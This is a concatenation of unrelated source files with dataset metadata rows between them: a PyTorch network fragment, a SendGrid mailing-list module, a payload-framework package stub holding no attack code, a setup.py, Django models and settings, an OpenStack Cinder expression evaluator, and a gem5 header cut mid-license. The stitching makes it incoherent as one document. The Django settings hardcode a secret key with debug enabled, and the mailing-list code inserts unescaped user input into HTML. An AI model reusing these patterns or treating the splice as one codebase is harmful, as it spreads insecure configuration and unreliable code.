syn0 = self.ec1(e0)
e1 = self.pool0(syn0)
e2 = self.ec2(e1)
syn1 = self.ec3(e2)
del e0, e1, e2
e3 = self.pool1(syn1)
e4 = self.ec4(e3)
syn2 = self.ec5(e4)
del e3, e4
e5 = self.pool2(syn2)
e6 = self.ec6(e5)
e7 = self.ec7(e6)
del e5, e6
d9 = torch.cat((self.dc9(e7), syn2))
del e7, syn2
d8 = self.dc8(d9)
d7 = self.dc7(d8)
del d9, d8
d6 = torch.cat((self.dc6(d7), syn1))
del d7, syn1
d5 = self.dc5(d6)
d4 = self.dc4(d5)
del d6, d5
d3 = torch.cat((self.dc3(d4), syn0))
del d4, syn0
d2 = self.dc2(d3)
d1 = self.dc1(d2)
del d3, d2
d0 = self.dc0(d1)
return d0
| 37.103093
| 109
| 0.588497
|
90d876744815401039d9cf87c0c7768941c6a5b9
| 10,740
|
py
|
Python
|
logic/emails/mailing_list.py
|
D516-lang/origin-website
|
3281a7017cf695cd0eeaca1a641be6ab5014118b
|
[
"MIT"
] | null | null | null |
logic/emails/mailing_list.py
|
D516-lang/origin-website
|
3281a7017cf695cd0eeaca1a641be6ab5014118b
|
[
"MIT"
] | null | null | null |
logic/emails/mailing_list.py
|
D516-lang/origin-website
|
3281a7017cf695cd0eeaca1a641be6ab5014118b
|
[
"MIT"
] | null | null | null |
import json
import re
from config import constants
from config import universal
from database import db, db_common, db_models
from flask import jsonify, flash, redirect
from flask_babel import gettext, Babel, Locale
from logic.emails import email_types
from nameparser import HumanName
import sendgrid
from tools import db_utils
from util import sendgrid_wrapper as sgw
from util.misc import log
DEFAULT_SENDER = sgw.Email(universal.CONTACT_EMAIL, universal.BUSINESS_NAME)
# we use our own database as the final source of truth for our mailing list
# but we sync email signups and unsubscribes to sendgrid for convenience
def add_sendgrid_contact(email, full_name=None, country_code=None, dapp_user=None):
try:
# pytest.skip("avoid making remote calls")
sg_api = sendgrid.SendGridAPIClient(apikey=constants.SENDGRID_API_KEY)
first_name = last_name = None
if full_name:
name = HumanName(full_name)
first_name = name.first
last_name = name.last
data = [{
"email": email,
"first_name": first_name,
"last_name": last_name,
"country_code": country_code,
"dapp_user": dapp_user
}]
response = sg_api.client.contactdb.recipients.post(request_body=data)
except Exception as e:
log('ERROR add_sendgrid_contact:', type(e), e)
return False
return True
def unsubscribe_sendgrid_contact(email):
try:
sg_api = sendgrid.SendGridAPIClient(apikey=constants.SENDGRID_API_KEY)
unsubscribe_group = 51716 # Universal unsubscribe group
data = {
"recipient_emails": [email]
}
response = sg_api.client.asm.groups._(unsubscribe_group).suppressions.post(request_body=data)
except Exception as e:
log('ERROR unsubscribe_sendgrid_contact:', type(e), e)
return False
return True
# Unsubscribe a list of emails.
def mass_unsubscribe_sendgrid_contact(emails):
try:
sg_api = sendgrid.SendGridAPIClient(apikey=constants.SENDGRID_API_KEY)
unsubscribe_group = 51716 # Universal unsubscribe group
data = {
"recipient_emails": emails
}
response = sg_api.client.asm.groups._(unsubscribe_group).suppressions.post(request_body=data)
except Exception as e:
log('ERROR mass_unsubscribe_sendgrid_contact:', type(e), e)
return False
return True
# Inserts or updates an entry in the email_list table.
# Returns True if a new entry was added, False if the entry already existed.
# Raises an exception in case of an error.
def add_contact(email, first_name, last_name, ip_addr, country_code):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
raise Exception('Invalid email')
# Emails are stored normalized to lowercase in the DB.
email = email.lower()
try:
# Attempt to load any existing entry matching the email.
row = db_models.EmailList.query.filter_by(email=email).first()
if row:
# Update the existing entry.
new_contact = False
row.first_name = first_name
row.last_name = last_name
row.ip_addr = ip_addr
row.country_code = country_code
else:
# Insert a new entry.
new_contact = True
row = db_models.EmailList()
row.email = email
row.first_name = first_name
row.last_name = last_name
row.unsubscribed = False
row.ip_addr = ip_addr
row.country_code = country_code
db.session.add(row)
db.session.commit()
except Exception as e:
log('ERROR add_contact:', type(e), e)
raise e
return new_contact
def send_welcome(email, source):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
return
if source is not None and source.lower() == 'ousd':
email_types.send_email_type('welcome_ousd', DEFAULT_SENDER, email)
else:
email_types.send_email_type('welcome1', DEFAULT_SENDER, email)
def presale(full_name, email, desired_allocation, desired_allocation_currency, citizenship, sending_addr, ip_addr):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
return gettext('Please enter a valid email address')
try:
me = db_models.Presale()
me.full_name = full_name
me.email = email
# me.accredited = (accredited=='1')
# me.entity_type = entity_type
me.desired_allocation = desired_allocation
me.desired_allocation_currency = desired_allocation_currency
me.citizenship = citizenship
me.sending_addr = sending_addr
# me.note = note
me.ip_addr = ip_addr
db.session.add(me)
db.session.commit()
except Exception as e:
log('ERROR presale:', type(e), e)
return gettext('Ooops! Something went wrong.')
if sending_addr:
sending_addr = "<a href='https://etherscan.io/address/"+sending_addr+"'>"+sending_addr+"</a>" if sending_addr.startswith('0x') else "<a href='https://blockchain.info/address/"+sending_addr+"'>"+sending_addr+"</a>"
message = """Name: %s<br>
Email: %s<br>
Desired allocation: %s %s<br>
Citizenship: %s<br>
Address: %s<br>
IP: %s""" % (
full_name, email,
desired_allocation, desired_allocation_currency,
citizenship,
sending_addr,
ip_addr)
email_types.send_email_type('presale', DEFAULT_SENDER, email)
sgw.notify_founders(message, subject=full_name + " is interested in the presale")
return gettext('Thanks! We\'ll be in touch soon.')
# Mark an email as unsubscribed in our DB.
# Raises an exception in case of an error.
def unsubscribe(email):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
raise Exception('Invalid email address')
me = db_models.EmailList.query.filter_by(email=email.lower()).first()
if not me:
print("returning not me")
return
print("unsubscribing...")
me.unsubscribed = True
db.session.add(me)
db.session.commit()
def send_one_off(email_type):
with db_utils.request_context():
# the message log takes care of deduping emails that may appear in multiple tables
for e in db_models.EmailList.query.filter_by(unsubscribed=False):
log(e.email)
email_types.send_email_type(email_type, DEFAULT_SENDER, e.email)
def partners_interest(name, company_name, email, website, note, ip_addr):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
return gettext('Please enter a valid email address')
if website and not re.match(r"(^(?:http(s)?:\/\/)?[\w.-]+(?:\.[\w\.-]+)+[\w\-\._~:/?#[\]@!\$&'\(\)\*\+,;=.]+$)", website):
return gettext('Please enter a valid website address')
try:
me = db_models.Interest()
me.name = name
me.company_name = company_name
me.email = email
me.website = website
me.note = note
me.ip_addr = ip_addr
db.session.add(me)
db.session.commit()
except Exception as e:
log('ERROR partners_interest:', type(e), e)
return gettext('Ooops! Something went wrong.')
message = "Name: %s<br>Company Name: %s<br>Email: %s<br>Website: %s<br>Note: %s" % (name, company_name,
email, website, note)
email_types.send_email_type('build_on_origin', DEFAULT_SENDER, email)
sgw.notify_admins(message,
subject="{name} ({company_name}) is interested in building on Origin".format(name=name,
company_name=company_name))
return gettext('Thanks! We\'ll be in touch soon.')
def list_cleanup():
sg_api = sendgrid.SendGridAPIClient(apikey=constants.SENDGRID_API_KEY)
response = sg_api.client.suppression.spam_reports.get()
people = json.loads(response.body)
print("Unsubscribing the following spam reporting email addresses:")
for person in people:
email = person['email'].lower()
contact = db_models.EmailList.query.filter_by(email=email).first()
# remove them from our marketing lists
# unsubscribe_sendgrid_contact(email)
print(person['email'])
if contact:
contact.spam_report = True
contact.unsubscribed = True
db.session.add(contact)
db.session.commit()
response = sg_api.client.suppression.invalid_emails.get()
people = json.loads(response.body)
print("Unsubscribing the following invalid email addresses:")
for person in people:
email = person['email'].lower()
contact = db_models.EmailList.query.filter_by(email=email).first()
# remove them from our marketing lists
# unsubscribe_sendgrid_contact(email)
print(person['email'])
if contact:
contact.invalid = True
contact.unsubscribed = True
db.session.add(contact)
db.session.commit()
response = sg_api.client.suppression.blocks.get()
people = json.loads(response.body)
print("Unsubscribing the following blocked email addresses:")
for person in people:
email = person['email'].lower()
contact = db_models.EmailList.query.filter_by(email=email).first()
# remove them from our marketing lists
# unsubscribe_sendgrid_contact(email)
print(person['email'])
if contact:
contact.blocked = True
contact.unsubscribed = True
db.session.add(contact)
db.session.commit()
response = sg_api.client.suppression.bounces.get()
people = json.loads(response.body)
print("Unsubscribing the following bounced email addresses:")
for person in people:
email = person['email'].lower()
contact = db_models.EmailList.query.filter_by(email=email).first()
# remove them from our marketing lists
# unsubscribe_sendgrid_contact(email)
print(person['email'])
if contact:
contact.bounced = True
contact.unsubscribed = True
db.session.add(contact)
db.session.commit()
| 38.633094
| 221
| 0.618901
|
c17e9d2a317ca03c68369638c14d0db36101a746
| 1,222
|
py
|
Python
|
hatloads/blocks/windows/__init__.py
|
YurinDoctrine/HatLoads
|
adc6fe51368f24a4a0b818138b6afa6e46969ff8
|
[
"MIT"
] | 1
|
2022-01-20T12:00:12.000Z
|
2022-01-20T12:00:12.000Z
|
hatloads/blocks/windows/__init__.py
|
YurinDoctrine/HatLoads
|
adc6fe51368f24a4a0b818138b6afa6e46969ff8
|
[
"MIT"
] | null | null | null |
hatloads/blocks/windows/__init__.py
|
YurinDoctrine/HatLoads
|
adc6fe51368f24a4a0b818138b6afa6e46969ff8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2022 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from .api import API
class Windows:
blocks = {
'api': API().block
}
| 35.941176
| 80
| 0.754501
|
b90102466efae9d60792a6ca7e5d8cf2539a7c0a
| 1,261
|
py
|
Python
|
setup.py
|
danimateo/ytmdl
|
c2f425e3493f414f246cf2c064e6491e8231c7a1
|
[
"MIT"
] | null | null | null |
setup.py
|
danimateo/ytmdl
|
c2f425e3493f414f246cf2c064e6491e8231c7a1
|
[
"MIT"
] | null | null | null |
setup.py
|
danimateo/ytmdl
|
c2f425e3493f414f246cf2c064e6491e8231c7a1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Setup ytmdl."""
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
req_pkgs = [
'youtube_dl',
'mutagen',
'itunespy==1.5.5',
'requests',
'colorama',
'bs4',
'downloader-cli',
'lxml',
'pyxdg',
'ffmpeg-python',
'pysocks',
'unidecode',
'tensorflow',
'inaSpeechSegmenter'
]
if __name__ == '__main__':
setuptools.setup(
name="ytmdl",
version="2020.07.09",
author="Deepjyoti Barman",
author_email="deep.barma30@gmail.com",
description="Youtube Music Downloader",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/deepjyoti30/ytmdl",
packages=setuptools.find_packages(),
classifiers=(
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
),
python_requires=">=3.*",
scripts=['bin/ytmdl'],
install_requires=req_pkgs,
setup_requires=req_pkgs
)
| 26.270833
| 54
| 0.528945
|
add4366a1cd4692905bb2459271be6454d4f0d46
| 7,543
|
py
|
Python
|
banco.py
|
lcs-amorim/OPE-EasyParty
|
b3439bf21523d7f3fb19b12283c24f364bf54388
|
[
"Apache-2.0"
] | null | null | null |
banco.py
|
lcs-amorim/OPE-EasyParty
|
b3439bf21523d7f3fb19b12283c24f364bf54388
|
[
"Apache-2.0"
] | 4
|
2020-06-05T18:01:15.000Z
|
2021-09-07T23:51:04.000Z
|
banco.py
|
lcs-amorim/OPE-EasyParty
|
b3439bf21523d7f3fb19b12283c24f364bf54388
|
[
"Apache-2.0"
] | 1
|
2018-10-02T23:45:15.000Z
|
2018-10-02T23:45:15.000Z
|
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class Colaboradores(models.Model):
nome_c = models.CharField(db_column='Nome_C', max_length=100) # Field name made lowercase.
codigo_c = models.AutoField(db_column='Codigo_C', primary_key=True) # Field name made lowercase.
telefone_c = models.IntegerField(db_column='Telefone_C') # Field name made lowercase.
class Meta:
managed = False
db_table = 'Colaboradores'
class Contratos(models.Model):
codigo_u = models.ForeignKey('Usuario', models.DO_NOTHING, db_column='Codigo_U') # Field name made lowercase.
descricao = models.TextField(db_column='Descricao') # Field name made lowercase.
dia = models.DateField(db_column='Dia') # Field name made lowercase.
hora = models.TimeField(db_column='Hora') # Field name made lowercase.
endereco_ct = models.CharField(db_column='Endereco_CT', max_length=100) # Field name made lowercase.
class Meta:
managed = False
db_table = 'Contratos'
class Fornecedor(models.Model):
nome_f = models.CharField(db_column='Nome_F', primary_key=True, max_length=100) # Field name made lowercase.
email_f = models.CharField(db_column='Email_F', max_length=100, blank=True, null=True) # Field name made lowercase.
endereco_f = models.CharField(db_column='Endereco_F', max_length=255) # Field name made lowercase.
telefoneprincipal = models.IntegerField(db_column='TelefonePrincipal') # Field name made lowercase.
telefonesecundario = models.IntegerField(db_column='TelefoneSecundario', blank=True, null=True) # Field name made lowercase.
categoria_f = models.CharField(db_column='Categoria_F', max_length=100) # Field name made lowercase.
class Meta:
managed = False
db_table = 'Fornecedor'
class Produto(models.Model):
codigo_p = models.AutoField(db_column='Codigo_P', primary_key=True) # Field name made lowercase.
nome_f = models.ForeignKey(Fornecedor, models.DO_NOTHING, db_column='Nome_F') # Field name made lowercase.
nome_p = models.CharField(db_column='Nome_P', max_length=100) # Field name made lowercase.
quantidade = models.SmallIntegerField(db_column='Quantidade') # Field name made lowercase.
categoria_p = models.CharField(db_column='Categoria_P', max_length=100) # Field name made lowercase.
class Meta:
managed = False
db_table = 'Produto'
class Usuario(models.Model):
codigo_u = models.AutoField(db_column='Codigo_U', primary_key=True) # Field name made lowercase.
nome_u = models.CharField(db_column='Nome_U', max_length=255) # Field name made lowercase.
usuario = models.CharField(db_column='Usuario', unique=True, max_length=100) # Field name made lowercase.
senha = models.CharField(db_column='Senha', max_length=100) # Field name made lowercase.
email_u = models.CharField(db_column='Email_U', max_length=100, blank=True, null=True) # Field name made lowercase.
cpf = models.IntegerField(db_column='CPF', unique=True) # Field name made lowercase.
telefone_u = models.IntegerField(db_column='Telefone_U') # Field name made lowercase.
endereco_u = models.CharField(db_column='Endereco_U', max_length=255) # Field name made lowercase.
news = models.NullBooleanField(db_column='News') # Field name made lowercase.
class Meta:
managed = False
db_table = 'Usuario'
class AuthGroup(models.Model):
name = models.CharField(unique=True, max_length=80)
class Meta:
managed = False
db_table = 'auth_group'
class AuthGroupPermissions(models.Model):
group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
permission = models.ForeignKey('AuthPermission', models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_group_permissions'
unique_together = (('group', 'permission'),)
class AuthPermission(models.Model):
name = models.CharField(max_length=255)
content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING)
codename = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'auth_permission'
unique_together = (('content_type', 'codename'),)
class AuthUser(models.Model):
password = models.CharField(max_length=128)
last_login = models.DateTimeField(blank=True, null=True)
is_superuser = models.BooleanField()
username = models.CharField(unique=True, max_length=150)
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=150)
email = models.CharField(max_length=254)
is_staff = models.BooleanField()
is_active = models.BooleanField()
date_joined = models.DateTimeField()
class Meta:
managed = False
db_table = 'auth_user'
class AuthUserGroups(models.Model):
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_user_groups'
unique_together = (('user', 'group'),)
class AuthUserUserPermissions(models.Model):
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
permission = models.ForeignKey(AuthPermission, models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_user_user_permissions'
unique_together = (('user', 'permission'),)
class DjangoAdminLog(models.Model):
action_time = models.DateTimeField()
object_id = models.TextField(blank=True, null=True)
object_repr = models.CharField(max_length=200)
action_flag = models.SmallIntegerField()
change_message = models.TextField()
content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING, blank=True, null=True)
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
class Meta:
managed = False
db_table = 'django_admin_log'
class DjangoContentType(models.Model):
app_label = models.CharField(max_length=100)
model = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'django_content_type'
unique_together = (('app_label', 'model'),)
class DjangoMigrations(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField()
class Meta:
managed = False
db_table = 'django_migrations'
class DjangoSession(models.Model):
session_key = models.CharField(primary_key=True, max_length=40)
session_data = models.TextField()
expire_date = models.DateTimeField()
class Meta:
managed = False
db_table = 'django_session'
class Sysdiagrams(models.Model):
name = models.CharField(max_length=128)
principal_id = models.IntegerField()
diagram_id = models.AutoField(primary_key=True)
version = models.IntegerField(blank=True, null=True)
definition = models.BinaryField(blank=True, null=True)
class Meta:
managed = False
db_table = 'sysdiagrams'
unique_together = (('principal_id', 'name'),)
| 38.682051
| 129
| 0.713907
|
c26f3248ed5b38c4b1da306d1e4df1b5d90b9e7c
| 3,121
|
py
|
Python
|
app/app/settings.py
|
stevie38mwenje/recipe
|
623038b47844000acee0053dcf3edff69822b1b8
|
[
"MIT"
] | null | null | null |
app/app/settings.py
|
stevie38mwenje/recipe
|
623038b47844000acee0053dcf3edff69822b1b8
|
[
"MIT"
] | null | null | null |
app/app/settings.py
|
stevie38mwenje/recipe
|
623038b47844000acee0053dcf3edff69822b1b8
|
[
"MIT"
] | null | null | null |
"""
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5%eeq_uv^3co6b9j-e7_^3t7t+h2h7cwr-xzq0)@962@_htjl+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"core",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = "core.User"
| 25.373984
| 91
| 0.69497
|
47887f3edc2b0b1aa790c3f6c2084fe4076b9ad4
| 7,831
|
py
|
Python
|
cinder/scheduler/evaluator/evaluator.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | null | null | null |
cinder/scheduler/evaluator/evaluator.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | 2
|
2018-10-25T13:04:01.000Z
|
2019-08-17T13:15:24.000Z
|
cinder/scheduler/evaluator/evaluator.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | 2
|
2018-10-17T13:32:50.000Z
|
2018-11-08T08:39:39.000Z
|
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import operator
import re
import pyparsing
import six
from cinder import exception
from cinder.i18n import _
def _operatorOperands(tokenList):
it = iter(tokenList)
while True:
try:
op1 = next(it)
op2 = next(it)
yield(op1, op2)
except StopIteration:
break
class EvalConstant(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
result = self.value
if (isinstance(result, six.string_types) and
re.match("^[a-zA-Z_]+\.[a-zA-Z_]+$", result)):
(which_dict, entry) = result.split('.')
try:
result = _vars[which_dict][entry]
except KeyError as e:
raise exception.EvaluatorParseException(
_("KeyError: %s") % e)
except TypeError as e:
raise exception.EvaluatorParseException(
_("TypeError: %s") % e)
try:
result = int(result)
except ValueError:
try:
result = float(result)
except ValueError as e:
raise exception.EvaluatorParseException(
_("ValueError: %s") % e)
return result
class EvalSignOp(object):
operations = {
'+': 1,
'-': -1,
}
def __init__(self, toks):
self.sign, self.value = toks[0]
def eval(self):
return self.operations[self.sign] * self.value.eval()
class EvalAddOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
sum = self.value[0].eval()
for op, val in _operatorOperands(self.value[1:]):
if op == '+':
sum += val.eval()
elif op == '-':
sum -= val.eval()
return sum
class EvalMultOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
prod = self.value[0].eval()
for op, val in _operatorOperands(self.value[1:]):
try:
if op == '*':
prod *= val.eval()
elif op == '/':
prod /= float(val.eval())
except ZeroDivisionError as e:
raise exception.EvaluatorParseException(
_("ZeroDivisionError: %s") % e)
return prod
class EvalPowerOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
prod = self.value[0].eval()
for op, val in _operatorOperands(self.value[1:]):
prod = pow(prod, val.eval())
return prod
class EvalNegateOp(object):
def __init__(self, toks):
self.negation, self.value = toks[0]
def eval(self):
return not self.value.eval()
class EvalComparisonOp(object):
operations = {
"<": operator.lt,
"<=": operator.le,
">": operator.gt,
">=": operator.ge,
"!=": operator.ne,
"==": operator.eq,
"<>": operator.ne,
}
def __init__(self, toks):
self.value = toks[0]
def eval(self):
val1 = self.value[0].eval()
for op, val in _operatorOperands(self.value[1:]):
fn = self.operations[op]
val2 = val.eval()
if not fn(val1, val2):
break
val1 = val2
else:
return True
return False
class EvalTernaryOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
condition = self.value[0].eval()
if condition:
return self.value[2].eval()
else:
return self.value[4].eval()
class EvalFunction(object):
functions = {
"abs": abs,
"max": max,
"min": min,
}
def __init__(self, toks):
self.func, self.value = toks[0]
def eval(self):
args = self.value.eval()
if type(args) is list:
return self.functions[self.func](*args)
else:
return self.functions[self.func](args)
class EvalCommaSeperator(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
val1 = self.value[0].eval()
val2 = self.value[2].eval()
if type(val2) is list:
val_list = []
val_list.append(val1)
for val in val2:
val_list.append(val)
return val_list
return [val1, val2]
class EvalBoolAndOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
left = self.value[0].eval()
right = self.value[2].eval()
return left and right
class EvalBoolOrOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
left = self.value[0].eval()
right = self.value[2].eval()
return left or right
_parser = None
_vars = {}
def _def_parser():
# Enabling packrat parsing greatly speeds up the parsing.
pyparsing.ParserElement.enablePackrat()
alphas = pyparsing.alphas
Combine = pyparsing.Combine
Forward = pyparsing.Forward
nums = pyparsing.nums
oneOf = pyparsing.oneOf
opAssoc = pyparsing.opAssoc
operatorPrecedence = pyparsing.operatorPrecedence
Word = pyparsing.Word
integer = Word(nums)
real = Combine(Word(nums) + '.' + Word(nums))
variable = Word(alphas + '_' + '.')
number = real | integer
expr = Forward()
fn = Word(alphas + '_' + '.')
operand = number | variable | fn
signop = oneOf('+ -')
addop = oneOf('+ -')
multop = oneOf('* /')
comparisonop = oneOf(' '.join(EvalComparisonOp.operations.keys()))
ternaryop = ('?', ':')
boolandop = oneOf('AND and &&')
boolorop = oneOf('OR or ||')
negateop = oneOf('NOT not !')
operand.setParseAction(EvalConstant)
expr = operatorPrecedence(operand, [
(fn, 1, opAssoc.RIGHT, EvalFunction),
("^", 2, opAssoc.RIGHT, EvalPowerOp),
(signop, 1, opAssoc.RIGHT, EvalSignOp),
(multop, 2, opAssoc.LEFT, EvalMultOp),
(addop, 2, opAssoc.LEFT, EvalAddOp),
(negateop, 1, opAssoc.RIGHT, EvalNegateOp),
(comparisonop, 2, opAssoc.LEFT, EvalComparisonOp),
(ternaryop, 3, opAssoc.LEFT, EvalTernaryOp),
(boolandop, 2, opAssoc.LEFT, EvalBoolAndOp),
(boolorop, 2, opAssoc.LEFT, EvalBoolOrOp),
(',', 2, opAssoc.RIGHT, EvalCommaSeperator), ])
return expr
def evaluate(expression, **kwargs):
"""Evaluates an expression.
Provides the facility to evaluate mathematical expressions, and to
substitute variables from dictionaries into those expressions.
Supports both integer and floating point values, and automatic
promotion where necessary.
"""
global _parser
if _parser is None:
_parser = _def_parser()
global _vars
_vars = kwargs
try:
result = _parser.parseString(expression, parseAll=True)[0]
except pyparsing.ParseException as e:
raise exception.EvaluatorParseException(
_("ParseException: %s") % e)
return result.eval()
| 26.278523
| 78
| 0.569148
|
b3f711d831c9ff76e549194360d55675424d86f7
| 4,232
|
py
|
Python
|
src/arch/arm/ArmTLB.py
|
fusiled/gem5
|
670436b9cd7a23f03c9d7248abb8eb19939c83a6
|
[
"BSD-3-Clause"
] | 22
|
2018-07-03T16:46:51.000Z
|
2022-03-22T08:29:36.000Z
|
src/arch/arm/ArmTLB.py
|
fusiled/gem5
|
670436b9cd7a23f03c9d7248abb8eb19939c83a6
|
[
"BSD-3-Clause"
] | 1
|
2022-02-21T07:56:08.000Z
|
2022-02-21T07:56:18.000Z
|
src/arch/arm/ArmTLB.py
|
fusiled/gem5
|
670436b9cd7a23f03c9d7248abb8eb19939c83a6
|
[
"BSD-3-Clause"
] | 25
|
2017-12-02T00:46:04.000Z
|
2022-02-18T19:28:53.000Z
|
# -*- mode:python -*-
# Copyright (c) 2009, 2013, 2015 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
